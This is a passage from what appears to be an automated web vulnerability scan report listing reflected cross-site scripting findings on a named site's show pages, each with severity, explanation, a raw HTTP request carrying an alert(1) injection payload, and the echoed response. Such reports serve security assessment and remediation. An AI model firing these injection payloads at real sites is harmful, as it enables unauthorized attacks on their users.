Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4cbfaeec7ed123668b3a45cda4a1424b=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50560

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/Lab-Rats605d2"><script>alert(1)</script>0f550289d8e" />
...[SNIP]...

3.94. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Lab-Rats

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f862"-alert(1)-"b0c5dfc94b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/Lab-Rats2f862"-alert(1)-"b0c5dfc94b0 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=e7f613b15848092e6b01b527ee3f9a12; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e7f613b15848092e6b01b527ee3f9a12=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50381

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/Lab-Rats2f862"-alert(1)-"b0c5dfc94b0";

</script>
...[SNIP]...

3.95. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Miss-Download

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86263'><script>alert(1)</script>484a3c8edc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Miss-Download86263'><script>alert(1)</script>484a3c8edc8 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=ccd093b6fe737b0f8d76bc785a9d9d9f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ccd093b6fe737b0f8d76bc785a9d9d9f=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50632

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/Miss-Download86263'><script>alert(1)</script>484a3c8edc8' />
...[SNIP]...

3.96. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Miss-Download

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26605"-alert(1)-"689bed10a7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/Miss-Download26605"-alert(1)-"689bed10a7d HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=41305656fdf4b89151e629d558c5966a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 41305656fdf4b89151e629d558c5966a=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50648

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/Miss-Download26605"-alert(1)-"689bed10a7d";

</script>
...[SNIP]...

3.97. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Miss-Download

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddabd"><script>alert(1)</script>d590b6c1636 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Miss-Downloadddabd"><script>alert(1)</script>d590b6c1636 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9135b2838d5782046085771f61f8a4c8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9135b2838d5782046085771f61f8a4c8=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50632

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/Miss-Downloadddabd"><script>alert(1)</script>d590b6c1636" />
...[SNIP]...

3.98. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Mr-Mobile

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b7b6d'><script>alert(1)</script>031da9bdfb8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Mr-Mobileb7b6d'><script>alert(1)</script>031da9bdfb8 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=ae2fcd6fdc468bd08f7f3e164698ee04; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ae2fcd6fdc468bd08f7f3e164698ee04=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50437

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/Mr-Mobileb7b6d'><script>alert(1)</script>031da9bdfb8' />
...[SNIP]...

3.99. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Mr-Mobile

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49459"><script>alert(1)</script>6537b84f503 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Mr-Mobile49459"><script>alert(1)</script>6537b84f503 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=0bd061f798757be20d5c10cb889c32c0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 0bd061f798757be20d5c10cb889c32c0=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50452

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/Mr-Mobile49459"><script>alert(1)</script>6537b84f503" />
...[SNIP]...

3.100. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Mr-Mobile

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfea8"-alert(1)-"554ac61bd4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/Mr-Mobilebfea8"-alert(1)-"554ac61bd4e HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4ec4e58dabe0a58f5b01a43ede0e3cd4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4ec4e58dabe0a58f5b01a43ede0e3cd4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/Mr-Mobilebfea8"-alert(1)-"554ac61bd4e";

</script>
...[SNIP]...

3.101. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/On-Deck

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d5fe3'><script>alert(1)</script>2aec528306 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/On-Deckd5fe3'><script>alert(1)</script>2aec528306 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=aaedf1562ad27fe7dbffc58ae5c56f87; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: aaedf1562ad27fe7dbffc58ae5c56f87=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50588

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/On-Deckd5fe3'><script>alert(1)</script>2aec528306' />
...[SNIP]...

3.102. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/On-Deck

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a2be"><script>alert(1)</script>0cc37f18b7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/On-Deck9a2be"><script>alert(1)</script>0cc37f18b7a HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=2190b7470bec9191f7a3b7fb33cc4ced; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2190b7470bec9191f7a3b7fb33cc4ced=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50578

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/On-Deck9a2be"><script>alert(1)</script>0cc37f18b7a" />
...[SNIP]...

3.103. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/On-Deck

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ab27"-alert(1)-"9bc82b719cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/On-Deck7ab27"-alert(1)-"9bc82b719cd HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=70c896269b3f0eef2dff476cbdc7ddf4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 70c896269b3f0eef2dff476cbdc7ddf4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50380

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/On-Deck7ab27"-alert(1)-"9bc82b719cd";

</script>
...[SNIP]...

3.104. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/The-Noob

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3d86'><script>alert(1)</script>b1ffded8566 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/The-Noobb3d86'><script>alert(1)</script>b1ffded8566 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=550a29db4533d9b4bb7330a8ad3d7e8f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 550a29db4533d9b4bb7330a8ad3d7e8f=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50416

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/The-Noobb3d86'><script>alert(1)</script>b1ffded8566' />
...[SNIP]...

3.105. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/The-Noob

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 756bb"-alert(1)-"c84622db6bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/The-Noob756bb"-alert(1)-"c84622db6bd HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=f615d29a7e5ec5d4974871af0bcf1182; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f615d29a7e5ec5d4974871af0bcf1182=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50341

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/The-Noob756bb"-alert(1)-"c84622db6bd";

</script>
...[SNIP]...

3.106. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/The-Noob

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a634"><script>alert(1)</script>ec3897212c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/The-Noob3a634"><script>alert(1)</script>ec3897212c8 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=1cc6f27e893df95ce1bafcfc9a13f70c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
